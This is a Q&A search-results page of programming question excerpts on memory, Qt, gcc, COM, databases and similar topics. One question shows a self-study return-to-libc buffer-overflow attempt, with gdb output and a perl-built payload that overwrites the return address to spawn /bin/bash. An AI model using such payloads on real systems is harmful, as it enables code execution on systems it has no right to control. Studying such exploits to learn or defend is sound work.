Search Results

Search found 13869 results on 555 pages for 'memory dump'.

Page 234 of 555

  • Penalty of using QGraphicsObject vs QGraphicsItem?

    - by Dutch
    I currently have a hierarchy of items based on QGraphicsItem. I want to move to QGraphicsObject instead so that I can put properties on my items. I will not be making use of signals/slots or any other features of QObject. I'm told that you shouldn't derive from QObject because it's "heavy" and "slow". To test the impact, I derive from QGraphicsObject, add a couple of properties to my items, and look at the memory usage of the running app. I create 1000 items using both flavors and I see no more than about 10k of additional memory usage. Since all I am adding to my items are properties, is it safe to say that QObject only adds weight if you are using signals/slots?
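
    For context, a minimal sketch (assuming Qt 4.6+; class and property names are hypothetical) of the kind of property-only QGraphicsObject subclass the question describes:

        #include <QGraphicsObject>
        #include <QPainter>

        class PropertyItem : public QGraphicsObject
        {
            Q_OBJECT
            Q_PROPERTY(int weight READ weight WRITE setWeight)   // property only, no signals/slots

        public:
            explicit PropertyItem(QGraphicsItem *parent = 0)
                : QGraphicsObject(parent), m_weight(0) {}

            int weight() const { return m_weight; }
            void setWeight(int w) { m_weight = w; }

            QRectF boundingRect() const { return QRectF(0, 0, 10, 10); }
            void paint(QPainter *p, const QStyleOptionGraphicsItem *, QWidget *)
            {
                p->drawRect(boundingRect());   // placeholder drawing
            }

        private:
            int m_weight;
        };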

    Read the article

  • Problem with return 2 libc method

    - by jth
    Hi, I'm trying to understand the return-to-libc method. I'm using Ubuntu Linux 9.10, 32-bit, with ASLR disabled. In theory it sounds quite easy: overwrite the saved eip with the address of system() (or whatever function you want), then put the address to which system() should return, and after that the parameter for system(), the "/bin/bash" string. But what happens is that my exploit keeps segfaulting the vulnerable program. I assume something with the system() address went wrong. This is what I did so far.

    First I determined the address of system():

        (gdb) print system
        $1 = {<text variable, no debug info>} 0x167020 <system>
        (gdb) x/x system
        0x167020 <system>: 0x890cec83

    I used the subsequent x/x system because the 3-byte value returned by print system looked like an index into some sort of jump table (PLT?), so I assumed 0x890cec83 is the right address to overwrite the saved eip with. After that I determined the address of the /bin/bash string in memory, using a small C program that basically consists of this line:

        printf("Address of string /bin/bash: %p\n", getenv("SHELL"));

    Then I looked around a little in memory and found /bin/bash:

        (gdb) x/s 0xbffff6ca
        0xbffff6ca: "/bin/bash"

    After I gathered this information, I filled the buffer:

        (gdb) b 9
        Breakpoint 1 at 0x8048407: file victim.c, line 9.
        (gdb) r `perl -e 'print "A"x9 . "\x83\xec\x0c\x89FAKE\xca\xf6\xff\xbf";'`
        Breakpoint 1, main (argc=1111638594, argv=0xc360cca) at victim.c:10
        10    return 0;
        (gdb) x/s 0xbffff6ca
        0xbffff6ca: "/bin/bash"

    The stack frame looks like this:

        (gdb) i f
        Stack level 0, frame at 0xbffff440:
        eip = 0x8048407 in main (victim.c:10); saved eip 0x890cec83
        source language c.
        Arglist at 0xbffff438, args: argc=1111638594, argv=0xc360cca
        Locals at 0xbffff438, Previous frame's sp is 0xbffff440
        Saved registers: ebp at 0xbffff438, eip at 0xbffff43c

    This all seems right to me: the saved eip was overwritten with the (hopefully) correct system() address, the return address for system() was set to "FAKE" (which shouldn't matter), and the address of /bin/bash also seems correct. But when I continue execution, victim segfaults at some strange address, and certainly not at 0x890cec83:

        (gdb) cont
        Continuing.
        Program received signal SIGSEGV, Segmentation fault.
        0x0804840d in main (argc=Cannot access memory at address 0x41414149) at victim.c:11
        11    }

    Does anyone have an explanation, or a hint about what happens here and why execution isn't redirected to 0x890cec83? Thanks in advance; any hint, even a vague one, would be appreciated. I have no idea why this doesn't work.
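
    The question does not show victim.c, but from the 9 bytes of padding in the payload it is presumably shaped something like this (purely a guess at the program's shape, not the poster's source):

        #include <string.h>

        int main(int argc, char *argv[])
        {
            char buffer[5];               /* hypothetical small buffer */
            if (argc > 1)
                strcpy(buffer, argv[1]);  /* unchecked copy runs past the buffer and
                                             clobbers the saved ebp/eip on the stack */
            return 0;                     /* the "10  return 0;" line in the transcript */
        }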

    Read the article

  • gcc/g++: error when compiling large file

    - by Alexander
    Hi, I have an auto-generated C++ source file, around 40 MB in size. It largely consists of push_back calls for some vectors, plus the string constants to be pushed. When I try to compile this file, g++ exits and says that it couldn't reserve enough virtual memory (around 3 GB). Googling this problem, I found that the command-line switches --param ggc-min-expand=0 --param ggc-min-heapsize=4096 may solve it. They, however, only seem to work when optimization is turned on. 1) Is this really the solution I am looking for? 2) Or is there a faster, better way to do this (compiling takes ages with these options activated)? Best wishes, Alexander

    Update: Thanks for all the good ideas. I tried most of them. Using an array instead of several push_back() operations reduced memory usage, but as the file I was trying to compile was so big, it still crashed, only later. In a way this behaviour is really interesting, as there is not much to optimize in such a setting -- what does GCC do behind the scenes that costs so much memory? (I compiled with all optimizations disabled as well and got the same results.)

    The solution I switched to now is reading the original data from a binary object file that I created from the original file using objcopy. This is what I originally did not want to do, because creating the data structures in a higher-level language (in this case Perl) was more convenient than doing it in C++. However, getting this running under Win32 was more complicated than expected. objcopy seems to generate files in the ELF format, and some of the problems I had disappeared when I manually set the output format to pe-i386. The symbols in the object file are by default named after the file name; e.g. converting the file inbuilt_training_data.bin results in these two symbols: binary_inbuilt_training_data_bin_start and binary_inbuilt_training_data_bin_end. I found some tutorials on the web claiming that these symbols should be declared as extern char _binary_inbuilt_training_data_bin_start;, but that does not seem to be right -- only extern char binary_inbuilt_training_data_bin_start; worked for me.
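
    A short sketch of consuming such an objcopy-embedded blob, using the underscore-less declarations the poster reports working with pe-i386 output (the wrapper function is made up):

        #include <cstddef>
        #include <string>

        extern char binary_inbuilt_training_data_bin_start;
        extern char binary_inbuilt_training_data_bin_end;

        std::string load_training_data()
        {
            const char *begin = &binary_inbuilt_training_data_bin_start;
            const char *end   = &binary_inbuilt_training_data_bin_end;
            // The blob is raw bytes; copy it out (or parse it in place).
            return std::string(begin, static_cast<std::size_t>(end - begin));
        }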

    Read the article

  • Where to start when programming process synchronization algorithms like clone/fork, semaphores

    - by David
    I am writing a program that simulates process synchronization. I am trying to implement the fork and semaphore techniques in C++, but am having trouble starting off. Do I just create a process and fork it from the very beginning? Is the program just going to be one infinite loop that goes back and forth between parent and child processes? And how do you set up "shared memory" in C++ -- an explicit memory address, or just some global variable? I just need to get the overall structure and flow of the program. Any references would be appreciated.
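
    As one possible starting point, here is a minimal sketch (POSIX mmap plus an unnamed semaphore; System V shmget/semget would also work; error checks omitted) of a parent and child sharing a counter -- not the asker's assignment, just a common shape for it:

        #include <semaphore.h>
        #include <sys/mman.h>
        #include <sys/wait.h>
        #include <unistd.h>
        #include <cstdio>

        struct Shared {
            sem_t sem;
            int   counter;
        };

        int main()
        {
            // MAP_SHARED | MAP_ANONYMOUS memory survives fork() and is visible to both processes.
            Shared *shared = static_cast<Shared *>(mmap(0, sizeof(Shared),
                                                        PROT_READ | PROT_WRITE,
                                                        MAP_SHARED | MAP_ANONYMOUS, -1, 0));
            sem_init(&shared->sem, /*pshared=*/1, /*value=*/1);
            shared->counter = 0;

            pid_t pid = fork();                 // both processes run the loop below
            for (int i = 0; i < 1000; ++i) {
                sem_wait(&shared->sem);         // enter the critical section
                ++shared->counter;
                sem_post(&shared->sem);         // leave the critical section
            }

            if (pid != 0) {                     // parent: wait for the child, then report
                wait(0);
                std::printf("counter = %d\n", shared->counter);   // expect 2000
                sem_destroy(&shared->sem);
                munmap(shared, sizeof(Shared));
            }
            return 0;
        }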

    Read the article

  • Qt vs .NET - a few comparisons [closed]

    - by Pirate for Profit
    Event Handling: In Qt's event handling system you just emit signals when something interesting happens and then catch them in slots, for instance emit valueChanged(int percent, bool something); and void MyCatcherObj::valueChanged(int p, bool ok){}, blocking them and disconnecting them when needed, doing it across threads... once you get the hang of it, it just seems a lot more natural and intuitive than the way .NET event handling is set up (you know, object sender, CustomEventArgs e). And I'm not just talking about syntax, because in the end the .NET delegate crap is the bomb, and I'm talking about more than just reflection (because, yes, .NET obviously has much stronger reflection capabilities). I'm talking about the way the system feels to a human being. Qt wins hands down, IMO. Basically, the footprint makes more sense and you can visualize the project more easily without a clunky event handling system. I wish I could explain it better. The only thing is, I do love some of the ease of C# compared to C++, and .NET's assembly architecture. That is a big bonus for modular projects, which are a PITA to do in C++.

    Database Ease of Doing Crap: Also, what about datasets and database manipulation? I think .NET wins here, but I'm not sure.

    Threading/Concurrency: What do you think of the threading? In .NET, all I've ever done is make a list of master worker threads with locks. I like the QtConcurrent framework: you don't worry about locks or anything, and with the ease of the signal/slot system across threads it's nice to get notified about the progress of things.

    Memory Usage: Also, what do you think of the overall memory usage comparison? Is the .NET garbage collector on the ball and quick compared to the instantaneous nature of native memory management? Or does it let programs leak up a storm and lag the computer, then clean up when it's about to really lag? However, I am a n00b who doesn't know what I'm talking about, please school me on the subject.
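
    For readers who have not seen the Qt side, a bare-bones sketch of the signal/slot pattern being described (class names are made up; connections across threads default to queued delivery):

        #include <QObject>

        class Worker : public QObject
        {
            Q_OBJECT
        signals:
            void valueChanged(int percent, bool ok);

        public slots:
            void doWork() { emit valueChanged(42, true); }
        };

        class Catcher : public QObject
        {
            Q_OBJECT
        public slots:
            void onValueChanged(int percent, bool ok)
            {
                Q_UNUSED(percent); Q_UNUSED(ok);   // react to the update here
            }
        };

        // Usage:
        // QObject::connect(&worker, SIGNAL(valueChanged(int,bool)),
        //                  &catcher, SLOT(onValueChanged(int,bool)));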

    Read the article

  • iPhone App Similar to the Talking Larry Application

    - by Zeeshan
    I am developing an iPhone application similar to the Talking Larry application. I am facing a low-memory issue when I pre-load the animations into an NSMutableArray. If I do not pre-load the animations and instead load them into the animation images when the user touches the button, it takes time and plays the animation back very slowly, and during video recording it does not play the complete animations. How can I resolve this? I want to play back the animations the way the Talking Larry app does, without running into the low-memory issue.

    Read the article

  • Writing to Samba share as different user?

    - by Hamid Elaosta
    I have a Samba share on my NAS drive, mounted as follows:

        mount -t smbfs -o username=backup,password=backups_password //sharebox/SVNBackup /mnt/SVNBackup

    I am then trying to run:

        sudo svnadmin dump /usr/local/svn/repos/testrepo > /mnt/SVNBackup/test1.svn

    but I get:

        bash: /mnt/SVNBackup/test1.svn: Permission Denied

    The backup location is set up to accept access only from the user "backup" (who doesn't exist on the local system). How do I go about solving this problem? Thanks

    Read the article

  • While loop in IL - why stloc.0 and ldloc.0?

    - by Michael Stum
    I'm trying to understand what a while loop looks like in IL. I have written this C# function:

        static void Brackets()
        {
            while (memory[pointer] > 0)
            {
                // Snipped body of the while loop, as it's not important
            }
        }

    The IL looks like this:

        .method private hidebysig static void Brackets() cil managed
        {
          // Code size       37 (0x25)
          .maxstack  2
          .locals init ([0] bool CS$4$0000)
          IL_0000:  nop
          IL_0001:  br.s       IL_0012
          IL_0003:  nop
          // Snipped body of the while loop, as it's not important
          IL_0011:  nop
          IL_0012:  ldsfld     uint8[] BFHelloWorldCSharp.Program::memory
          IL_0017:  ldsfld     int16 BFHelloWorldCSharp.Program::pointer
          IL_001c:  ldelem.u1
          IL_001d:  ldc.i4.0
          IL_001e:  cgt
          IL_0020:  stloc.0
          IL_0021:  ldloc.0
          IL_0022:  brtrue.s   IL_0003
          IL_0024:  ret
        } // end of method Program::Brackets

    For the most part this is really simple, except for the part after cgt. What I don't understand is the local [0] and the stloc.0/ldloc.0. As far as I see it, cgt pushes the result onto the stack, stloc.0 pops the result from the stack into the local variable, ldloc.0 pushes the result onto the stack again, and brtrue.s reads it from the stack. What is the purpose of doing this? Couldn't it be shortened to just cgt followed by brtrue.s?

    Read the article

  • what's faster: merging lists or dicts in python?

    - by tipu
    I'm working with an app that is CPU-bound more than memory-bound, and I'm trying to merge two things, whether they be sets or dicts. Now, the thing is I can choose either one, but I'm wondering if merging dicts would be faster since it's all in memory? Or is it always going to be O(n), n being the size of the smaller set? The reason I asked about dicts rather than sets is that I can't convert a set to JSON, because that results in {key1, key2, key3} and JSON needs key/value pairs, so I am using a dict so that json.dumps returns {key1: 1, key2: 1, key3: 1}. Yes, this is wasteful, but if it proves to be faster then I'm okay with it.

    Read the article

  • process killed -- delete output file?

    - by user13743
    I have a bash script that runs on our shared web host. It does a dump of our MySQL database and zips up the output file. Sometimes the mysqldump process gets killed, which leaves an incomplete SQL file that still gets zipped. How do I get my script to notice that the process was killed and delete the output file if that happened?

    Read the article

  • Some basic COM question...

    - by smwikipedia
    I have just finished my first COM server DLL, and it runs smoothly. So I'd like to lay out my current understanding and hear your critique.

    1- How does COM work, simply? COM is "the call chain": COM library methods -> traditional DLL exports -> classes encapsulated in the COM DLL.

    2- With C++, OOP benefits like "interface" can only be taken advantage of at the source level. With COM, these benefits can be used at the binary level.

    3- An illustration of an interface: &pInterface (Ixx **, i.e. void **) -> pInterface (Ixx *) -> interface (the method table) -> methods. An interface is a data structure in memory; it's nothing but a memory area containing a method table.

    Is my understanding all right? Thanks for your review.
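
    To make point 3 concrete, this is roughly what an interface pointer resolves to at the binary level, spelled out by hand (a layout mock-up only -- real interfaces come from MIDL-generated headers, and on x86 the methods use the __stdcall convention):

        // Stand-ins for the real Windows typedefs, so the sketch is self-contained.
        typedef long          HRESULT_t;
        typedef unsigned long ULONG_t;
        struct IID_t { unsigned char bytes[16]; };

        struct IMyThingVtbl {
            // Every COM interface begins with the three IUnknown entries.
            HRESULT_t (*QueryInterface)(void *self, const IID_t &riid, void **ppv);
            ULONG_t   (*AddRef)(void *self);
            ULONG_t   (*Release)(void *self);
            HRESULT_t (*DoSomething)(void *self, int value);   // hypothetical extra method
        };

        struct IMyThing {
            const IMyThingVtbl *lpVtbl;   // the "method table" from point 3
        };

        // A call written as p->DoSomething(42) against a COM interface pointer p
        // compiles down to roughly p->lpVtbl->DoSomething(p, 42).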

    Read the article

  • Question about "Link Map" output and "Assume" directive of MASM assembler.

    - by smwikipedia
    I am new to MASM, so the questions may be quite basic. When I use the MASM assembler, there's an output file called a "link map". Its content consists of the starting offset and length of various segments, such as the data segment, code segment and stack segment. What is this information describing? Is it how the various segments are located within the EXE file, or how the segments are laid out in memory after the EXE file has been loaded by the program loader? BTW: What does the Assume directive do? My understanding is that it tells the assembler to emit some information into the EXE file header so the program loader can use it to set the DS, CS, SS and ES registers accordingly. Am I right on this? Thanks in advance.

    Read the article

  • Cannot load from mysql.proc

    - by Timo Schneider
    I cannot dump my MySQL databases; here's the error message:

        Cannot load from mysql.proc. The table is probably corrupted

    mysql_upgrade doesn't seem to work either:

        # mysql_upgrade
        Looking for 'mysql' as: mysql
        Looking for 'mysqlcheck' as: mysqlcheck
        Running 'mysqlcheck with default connection arguments
        mysqlcheck: Got error: 1045: Access denied for user 'root'@'localhost' (using password: NO) when trying to connect
        FATAL ERROR: Upgrade failed

    What does that mean?

    Read the article

  • create a list of threads in C

    - by Hristo
    My implementation (in C) isn't working... the first node is always NULL, so I can't free the memory. I'm doing:

        thread_node_t *thread_list_head = NULL; // done at the beginning of the program

        ...

        // later on in the program
        thread_node_t *thread = (thread_node_t*) malloc(sizeof(thread_node_t));
        pthread_create(&(thread->thread), NULL, client_thread, &csFD);
        thread->next = thread_list_head;
        thread_list_head = thread;

    So when I try to free this memory, thread_list_head is NULL.

        while (thread_list_head != NULL) {
            thread_node_t *temp = thread_list_head;
            thread_list_head = thread_list_head->next;
            free(temp);
            temp = NULL;
        }

    Any advice on how to fix this, or a better way to build this list? Thanks, Hristo
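
    For comparison, a self-contained sketch of the same push-onto-the-head pattern (pthreads, placeholder thread body and descriptor), with a pthread_join added before each free:

        #include <pthread.h>
        #include <cstdio>
        #include <cstdlib>

        struct thread_node_t {
            pthread_t      thread;
            thread_node_t *next;
        };

        static void *client_thread(void *arg)
        {
            (void)arg;                          // placeholder body
            return 0;
        }

        int main()
        {
            thread_node_t *thread_list_head = 0;
            int csFD = 42;                      // stand-in for the real descriptor

            for (int i = 0; i < 4; ++i) {
                thread_node_t *node = static_cast<thread_node_t *>(std::malloc(sizeof(thread_node_t)));
                pthread_create(&node->thread, 0, client_thread, &csFD);
                node->next = thread_list_head;  // push onto the front of the list
                thread_list_head = node;
            }

            while (thread_list_head != 0) {
                thread_node_t *temp = thread_list_head;
                pthread_join(temp->thread, 0);  // make sure the thread finished before freeing
                thread_list_head = thread_list_head->next;
                std::free(temp);
            }
            return 0;
        }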

    Read the article

  • Texture allocations being doubled in iPhone OpenGL ES

    - by Kyle
    The couple of lines below are called 15 times during initialization. The tx-size is reported as 512 every time, so this allocates a 1 MB image in memory 15 times, for a total of 15 MB used. However, I noticed Instruments is reporting a total of 31 allocations! (15*2)+1

        glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, tx-size, tx-size, 0, GL_RGBA, GL_UNSIGNED_BYTE, spriteData);
        free(spriteData);

    Likewise, in another area of my program that allocates 6 256x256x4 (256 kB) textures, I see 13 sitting there. (6*2)+1 Anyone know what's going on here? It seems like awful memory management, and I really hope it's my fault. Just to let everyone know, I'm on the simulator.

    Read the article

  • streaming XML serialization in .net

    - by Luca Martinetti
    Hello, I'm trying to serialize a very large IEnumerable<MyObject> using an XmlSerializer without keeping all the objects in memory. The IEnumerable<MyObject> is actually lazy. I'm looking for a streaming solution that will:

    1. take an object from the IEnumerable<MyObject>,
    2. serialize it to the underlying stream using the standard serialization (I don't want to handcraft the XML here!),
    3. discard the in-memory data and move on to the next.

    I'm trying this code:

        using (var writer = new StreamWriter(filePath))
        {
            var xmlSerializer = new XmlSerializer(typeof(MyObject));
            foreach (var myObject in myObjectsIEnumerable)
            {
                xmlSerializer.Serialize(writer, myObject);
            }
        }

    but I'm getting multiple XML headers and I cannot specify a root tag <MyObjects>, so my XML is invalid. Any idea? Thanks

    Read the article

  • Efficient banner rotation with PHP

    - by reggie
    I rotate a banner on my site by selecting it randomly from an array of banners. Sample code as demonstration:

        <?php
        $banners = array(
            '<iframe>...</iframe>',
            '<a href="#"><img src="#.jpg" alt="" /></a>',
            //and so on
        );
        echo $banners[rand(0, count($banners) - 1)];  // index into the array; rand()'s upper bound is inclusive
        ?>

    The array of banners has become quite big, and I am concerned about the amount of memory this array adds to the execution of my page. But I can't figure out a better way of showing a random banner without loading all the banners into memory...

    Read the article

  • Algorithm: How to tell if an array is a permutation in O(n)?

    - by Iulian Serbanoiu
    Hello, Input: a read-only array of N elements containing integer values from 1 to N, and a memory zone of a fixed size (10, 100, 1000 etc. -- not depending on N). How can you tell in O(n) whether the array represents a permutation? What I have achieved so far: I use the limited memory area to store the sum and the product of the array. I compare the sum with N*(N+1)/2 and the product with N!. I know that if condition (2) is true I might have a permutation. I'm wondering if there's a way to prove that condition (2) is sufficient to tell whether I have a permutation. So far I haven't figured this out... Thanks, Iulian
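
    For contrast, the check is straightforward in O(n) time if O(N) extra memory were allowed; the fixed-size memory zone in the question is exactly what rules this baseline out:

        #include <cstddef>
        #include <vector>

        bool is_permutation_1_to_n(const int *a, std::size_t n)
        {
            std::vector<bool> seen(n + 1, false);   // O(N) scratch space -- violates the constraint
            for (std::size_t i = 0; i < n; ++i) {
                if (a[i] < 1 || static_cast<std::size_t>(a[i]) > n || seen[a[i]])
                    return false;                   // out of range, or a duplicate
                seen[a[i]] = true;
            }
            return true;                            // n distinct values in 1..N => permutation
        }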

    Read the article

  • MySQL query cache vs caching result-sets in the application layer

    - by GetFree
    I'm running a PHP/MySQL-driven website with a lot of visits, and I'm considering caching result sets in shared memory in order to reduce database load. However, right now MySQL's query cache is enabled and it seems to be doing a pretty good job, since if I disable query caching, CPU usage jumps to 100% immediately. Given that situation, I don't know if caching result sets (or even the generated HTML code) locally in shared memory with PHP will result in any noticeable performance improvement. Does anyone out there have experience with this? PS: Please avoid suggesting heavy-artillery solutions like memcached. Right now I'm looking for simple solutions that don't require too much time to implement, deploy and maintain.

    Read the article

  • Handling an exception from an unmanaged DLL in C#

    - by StuffHappens
    Hello. I have the following function written in C#:

        public static string GetNominativeDeclension(string surnameNamePatronimic)
        {
            if (surnameNamePatronimic == null)
                throw new ArgumentNullException("surnameNamePatronimic");
            IntPtr[] ptrs = null;
            try
            {
                ptrs = StringsToIntPtrArray(surnameNamePatronimic);
                int resultLen = MaxResultBufSize;
                int err = decGetNominativePadeg(ptrs[0], ptrs[1], ref resultLen);
                ThrowException(err);
                return IntPtrToString(ptrs, resultLen);
            }
            catch
            {
                return surnameNamePatronimic;
            }
            finally
            {
                FreeIntPtr(ptrs);
            }
        }

    The function decGetNominativePadeg lives in an unmanaged DLL:

        [DllImport("Padeg.dll", EntryPoint = "GetNominativePadeg")]
        private static extern Int32 decGetNominativePadeg(IntPtr surnameNamePatronimic, IntPtr result, ref Int32 resultLength);

    and it throws an exception: "Attempted to read or write protected memory. This is often an indication that other memory is corrupt." The catch in the C# code doesn't actually catch it. Why? How can I handle this exception? Thank you for your help!

    Read the article

  • J2ME Reduce Image color-depth/ Compress Image size

    - by updateraj
    Hi, I need to transmit an image from the mobile phone to the server. I am able to reduce the image's screen size but not its memory size. I understand I have to deal with the color depth. J2ME does not seem to offer the scaling methods that are available in J2SE:

        Image rescaled = image.getScaledInstance(thumbWidth, thumbHeight, Image.SCALE_AREA_AVERAGING);
        BufferedImage biRescaled = toBufferedImage(rescaled, thumbWidth, thumbHeight, BufferedImage.TYPE_INT_RGB);

    How would I tackle this? I would like to reduce the image's memory size before I transmit it to the server. Thank you

    Read the article

  • I don't understand Application Domains

    - by Jeremy Edwards
    .NET has this concept of Application Domains which, from what I understand, can be used to load an assembly into memory. I've done some research on Application Domains and also went to my local book store for additional material on the subject, but it seems very scarce. All I know is that I can use Application Domains to load assemblies into memory and unload them when I want. What other capabilities do Application Domains have beyond the ones I've mentioned? Do threads respect Application Domain boundaries? Are there any drawbacks to loading assemblies into Application Domains other than the main Application Domain, beyond the performance cost of cross-domain communication? Links to resources that discuss Application Domains would be nice as well. I've already checked MSDN, which doesn't have much information about them.

    Read the article

  • How can I do daily backups for my VisualSVN Repos?

    - by Tyler
    How can I do daily backups of my VisualSVN repositories? They're on a Windows Server 2003 machine running VisualSVN Server. I was thinking about just doing an xcopy of the folder C:\Repo, but I'm not familiar enough with SVN to know whether that will cause issues. Should I use dump or hotcopy, or both?

    Read the article

  • Can GPU capabilities impact virtual machine performance?

    - by Dave White
    While this may not seem like a programming question directly, it impacts my development activities, so it seems like it belongs here. It seems that more and more developers are turning to virtual environments for development activities on their computers, SharePoint development being a prime example. Also, as a trainer, I have virtual training environments for all of the classes that I teach.

    I recently purchased a new Dell E6510 to travel around with. It has the i7 620M (dual-core, HyperThreaded CPU running at 2.66 GHz) and 8 GB of memory. Reading the spec sheet, it sounded like it would be a great laptop to carry around and run virtual machines on. Getting the laptop, though, I've been pretty disappointed with the user experience of developing in a virtual machine. Giving the virtual machine 4 GB of memory, it was slow; I could type complete sentences and watch the VM "catch up".

    My company has training laptops that we provide for our classes. They are Dell Precision M6400s with an Intel Core 2 Duo P8700 running at 2.54 GHz and 8 GB of memory, and the experience on these laptops is night and day compared to the E6510. They are crisp and you are barely aware that you are running in a virtual environment. Since the E6510 should be faster in all categories than the M6400, I couldn't understand why the new laptop was slower, so I did a component-by-component comparison, and the only place where the E6510 is less performant than the M6400 is the graphics department. The M6400 is running an nVidia FX 2700M GPU and the E6510 an nVidia 3100M GPU. Benchmarks of the two GPUs suggest that the FX 2700M is twice as fast as the 3100M (http://www.notebookcheck.net/Mobile-Graphics-Cards-Benchmark-List.844.0.html): 3100M = 111th (E6510), FX 2700M = 47th (Precision M6400), Radeon HD 5870 = 8th (Alienware).

    The host OS is Windows 7 64-bit, as is the guest OS, running in VirtualBox 3.1.8 with Guest Additions installed on the guest. The IDE being used in the virtual environment is VS 2010 Premium. So after that long setup, my question is: is the GPU significantly impacting the virtual machine's performance, or are there other factors that I'm not looking at that I can use to boost the VM's performance? Do we now have to consider GPU performance when purchasing laptops where we expect to use virtualized development environments? Thanks in advance. Cheers, Dave

    Read the article

  • What is the best way to implement an object cache with Entity Framework?

    - by Harshal
    Say I have a table of "BlogPosts" in a database and I want to cache the ones that have already been retrieved, in memory, for further reads. I can just use a standard hashtable-type memory cache like System.Web.Caching.Cache. But if I then need to update a property on one of these blog posts, e.g. blogPost.Title, and update the record in the DB, I cannot do this without fetching it again from the database, because the Entity Framework context used to fetch the record when it was loaded into my cache has already been disposed. How do I write code so that I can get an object from my cache, update one property and just call the SaveChanges method without incurring an extra read?

    Read the article
